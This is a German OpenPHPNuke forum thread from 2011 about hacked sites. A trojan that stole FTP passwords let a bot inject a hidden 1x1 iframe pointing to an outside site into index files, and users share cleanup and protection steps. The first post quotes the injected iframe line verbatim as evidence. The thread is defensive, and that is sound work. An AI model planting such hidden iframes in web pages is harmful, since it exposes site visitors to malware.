Autor spinne
Datum 25.01.2011 18:14
Beiträge: Sali zusammen

Hab heut einen User im Chat gehabt, bei dem der Server gehackt worden ist. Bei ihm sind in sämtlichen index.php Dateien folgendes eingebaut worden:
?<html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>>

die Infizierung macht sich durch folgende Fehlermeldung bemerkbar:
Beispiel:
Parse error: syntax error, unexpected '?' in xxxxxx/opn/system/user_birthday/plugin/autostart/index.php on line 92

In diesem Fall sollte man alle Datein löschen und OPN Neu hochladen. Sicherung des Caches, eigene Bilder und Anpassungen sollte auf jeden Fall vorher gemacht worden sein. Auch die mainfile auf jeden Fall vorher sichern.



Übe Dich in Geduld, wenn Du etwas erreichen willst ----------------------------------------------------------------------------------------- Geheime Gedanken -- Mein Spinnennetz -- Spinnennetz CH -- RenderWorld Cinema4d Testbereiche, nachgeschaut und dann nachgefragt: OPN-Laborcenter --- OPN-Themes --- OPN-Bugtracking --- OPN-Doku --- OPN-FAQ


Autor Flash
Datum 26.01.2011 10:07
Beiträge: Bei dem Hack handelt es sich nicht um eine Sicherheitslücke von OPN.

Das ganze passiert direkt über den FTP Zugang. Der jeweilige User hat auf seinem Rechnern einen Trojaner, welcher die FTP Passwörter von Filezilla und WS FTP ausliest. Mit diesem Zugang wir dann über ein Bot allen index.php, index.html Datein ein iframe eingeschleusst.

Gemäss Recherche im Internet ist der Trojaner nicht neu. Er nutzt nur neue sowie auch alte Sicherheichtslücken auf dem lokalen Rechner.

So zum Beispiel mit PDF Dateien, welchen den Schädling aus dem Netz laden. (Im Adobe Reader Javacript ausschalten)

Achtung:
Es langt nicht einfach die FTP Zugangsdaten zu ändern. Solange der Rechner nicht sauber ist, wird das Tool immer wieder an die Passwörter kommen.

Rechner zum Beispiel mit diesem Tool hier prüfen:
http://www.malwarebytes.org/


Mehr Infos zu diesem Trojaner findet ihr bei http://www.trojaner-board.de


Flash





F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm
OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz --- Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal

[ Diese Nachricht wurde bearbeitet von: Flash am 26.01.2011 10:14 (Originaldatum 26.01.2011 10:07) ]


Autor darksweetys
Datum 11.02.2011 13:52
Beiträge: Also mich hats nun auch erwischt.  Lade OPN grad neu hoch, allerdings der Cache ist ja auch befallen. Kommt man dann überhaupt über eine komplette Neuinstallation herum?


DarkSweetys


Autor Flash
Datum 11.02.2011 14:03
Beiträge: Hallo André

Kommt man dann überhaupt über eine komplette Neuinstallation herum?


ja, du musst OPN nicht neue installieren.

Es müssen alle index.php und index.html Dateien ersetzt werden.

Vorgehen:
- das eigene Theme sichern
- alle Cache Ordner sichern
- alle eigenen GIF's etc aus dem Ordner /images und default_images sichern
- mainfile.php sichern
- htaccess sichern

Alle Files auf dem Server löschen

- eigene Themes prüfen und den Schadcode entfernen
- im cache Ordner alle index.html Dateien ersetzen

Upload:
- neues OPN hochladen
- alte mainfile hochladen
- eigenes sauberes Theme hochladen
- cache hochladen

Danach sollte der Fehler behoben sein

Flash










F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm
OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz --- Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal


Autor darksweetys
Datum 11.02.2011 15:18
Beiträge: So, ich hoffe es reicht diese eine Zeile Code zu entfernen. Zum Glück wurde der own_language Ordner im Cache nicht befallen, denn da sind haufenweise index-Datein. Warscheinlich arbeitet der Trojaner bis in eine gewisse Strukturtiefe.


DarkSweetys

[ Diese Nachricht wurde bearbeitet von: darksweetys am 11.02.2011 15:57 (Originaldatum 11.02.2011 15:18) ]


Autor Scout_GP
Datum 11.02.2011 16:03
Beiträge: Wie heißt das Teil denn?

Gruß Scout +++ Last.fm | Scoutweb +++


Autor darksweetys
Datum 11.02.2011 16:21
Beiträge: Irgendetwas mit Script:Iframer. Es scheint wirklich so zu sein wie Rolf es beschrieben hat. Ich hab dummerweise nicht mit der aktuellen Version von Filezilla gearbeitet.


DarkSweetys


Autor Flash
Datum 11.02.2011 16:37
Beiträge: Durchsuche deinen Rechner nach der Datei portwexexe
Das könnte der Übeltäter sein.
Im Weiteren vermute ich, dass ein Trojaner auf dem Rechner an die FTP Passwörter ran kommt.

Beim erste Fall wo wir hier hatten haben ich das FTP Login Protokoll gesehen. Darin ist ganz klar deutlich zu sehen, dass von ausserhalb per FTP eingeloggt wurde.
Ich vermute daher schwer, dass ein lokaler Trojaner die Daten aus dem Filezilla auslesen kann und dann verbreitet.
Im Netz findet man viele User die genau dasselbe Problem haben. Egal ob OPN, Joomla, WordPress oder was weis ich installiert war.

Von daher ist es keine Sicherheitslücke in der Anwendung.

Achtung:
Das eingebundene IFRAME hat verschiedenen URL's.
Durchsucht also die Seiten generell nach IFRAME


Flash





F.L.A.S.H.: Functional Lifeform Assembled for Sabotage and Harm
OPN Themes/Templates --- Jobs Aktuell --- Geheime Gedanken --- mein spinnennetz --- Aktuelle Jobs in der Schweiz --- RenderWorld Cinema4d Portal


Autor darksweetys
Datum 11.02.2011 18:19
Beiträge: Die portwexexe hab ich zwar nicht aber das hat nichts zu sagen vermute ich. Trojaner findet mein Antivirenprogramm immerwieder einmal.

Gibt es Möglichkeiten FTP-Programme aus einer sicheren Umgebung zu starten?


DarkSweetys


Autor Scout_GP
Datum 11.02.2011 20:24
Beiträge: Also ich scheine nichts weiter zu haben. Benutze aber auch kein FTP Programm, kein Filezilla etc.


Gibt es Möglichkeiten FTP-Programme aus einer sicheren Umgebung zu starten?


Ich nutze seid einiger Zeit KeySrambler. Mit Sandboxiekann man auch arbeiten.

Gruß Scout +++ Last.fm | Scoutweb +++


Autor spinne
Datum 11.02.2011 20:54
Beiträge: ich hätts fast vergessen zu schreiben

hätt ich wetten abgeschlossen wen es als nächsten trifft, wär ich jetzt reich

Übe Dich in Geduld, wenn Du etwas erreichen willst ----------------------------------------------------------------------------------------- Geheime Gedanken -- Mein Spinnennetz -- Spinnennetz CH -- RenderWorld Cinema4d Testbereiche, nachgeschaut und dann nachgefragt: OPN-Laborcenter --- OPN-Themes --- OPN-Bugtracking --- OPN-Doku --- OPN-FAQ


Autor darksweetys
Datum 11.02.2011 21:00
Beiträge: Mh, wegen FileZilla? Aber hast Recht, sowas nehm ich immer mit


DarkSweetys


Autor darksweetys
Datum 09.03.2011 20:46
Beiträge: So, nochmal zum Endbericht.

Der schöne und nicht harmlose Trojaner nennt sich Spyeye.

Die Jungs von http://www.trojaner-board.de/ haben mir schnell und präzise geholfen. Dort sind auch einige Tipps nachzulesen wie man sein System besser schützen kann.

Die Anwendung von Sandboxie ist nur eine nützliche Kleinigkeit.

Dieser Trojaner hat sich trotz Kasparsky , Anti-Malware von Emisoft und Antimalware eingeschlichen.
Er spioniert nicht nur Zugangsdaten aus sondern macht den Infizierten Rechner auch zum Teil eines Bootnetzes.

PS: Danke nochmal Rolf fürs Absichern.


DarkSweetys


Autor Scout_GP
Datum 10.03.2011 08:33
Beiträge: Kannste bitte einen Direktlink zu Deinem Beitrag auf http://www.trojaner-board.de/ setzen?

Würde mich interessieren, aber so suche ich mir nen Wolf.
Danke

Gruß Scout +++ Last.fm | Scoutweb +++


Autor darksweetys
Datum 10.03.2011 13:45
Beiträge: http://www.trojaner-board.de/96393-trojaner-noch-da.html


DarkSweetys




Diese Seite drucken
Diese Seite schließen

Dieser Artikel kommt von: OpenPHPNuke - das Open Source CMS

http://www.openphpnuke.info/